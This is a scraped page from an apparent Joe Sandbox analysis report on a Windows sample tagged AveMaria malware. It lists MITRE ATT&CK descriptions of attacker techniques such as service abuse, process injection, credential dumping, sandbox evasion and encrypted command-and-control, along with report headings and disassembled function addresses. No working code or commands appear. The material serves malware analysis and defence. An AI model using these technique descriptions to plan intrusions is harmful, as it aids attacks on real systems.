Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ax4BSyUKd4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: AveMaria

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
ax4BSyUKd4.exe

Function 010448B6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 138
comCOMMON

Function 0103577F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151
networkCOMMON

Function 01036034 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Function 010454EB Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 191
registrystringCOMMON

Function 010426DC Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 296
fileprocessCOMMON

Function 0103E5A3 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 121
COMMON

Function 0103E5A1 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 112
COMMON

Function 0103594B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75
networksynchronizationCOMMON

Function 0103910D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38
libraryCOMMON

Function 01035E28 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Function 010434A2 Relevance: 6.0, APIs: 4, Instructions: 48
fileCOMMON

Function 0104111B Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Function 010336F7 Relevance: 4.5, APIs: 3, Instructions: 23
stringCOMMON

Function 01035B4E Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 158
sleepCOMMON

Function 01033666 Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Function 01042612 Relevance: 3.0, APIs: 2, Instructions: 47
registryCOMMON

Function 0104338D Relevance: 3.0, APIs: 2, Instructions: 14
sleepCOMMON

Function 010417A2 Relevance: 3.0, APIs: 2, Instructions: 8
synchronizationCOMMON

Function 01036045 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Function 01031085 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Function 010331AF Relevance: 2.6, APIs: 2, Instructions: 53
COMMON

Function 010409A0 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Function 01042514 Relevance: 1.5, APIs: 1, Instructions: 28
registryCOMMON

Function 010332E6 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Function 01033447 Relevance: 1.5, APIs: 1, Instructions: 25
stringCOMMON

Function 01035A23 Relevance: 1.5, APIs: 1, Instructions: 23
networkCOMMON

Function 010412C4 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 010417B7 Relevance: 1.5, APIs: 1, Instructions: 15
synchronizationCOMMON

Function 01042554 Relevance: 1.5, APIs: 1, Instructions: 9
registryCOMMON

Function 01041E88 Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Function 01034F74 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Function 01035F68 Relevance: 1.3, APIs: 1, Instructions: 17
memoryCOMMON

Function 01039733 Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Function 01035FFA Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposesand to support other malicious activities, including distraction, hacktivism, and extortion.
Tactics:	Impact
Data Sources:	Netflow/Enclave netflow, Network device logs, Network intrusion detection system, Network protocol analysis, SSL/TLS inspection, Web application firewall logs, Web logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre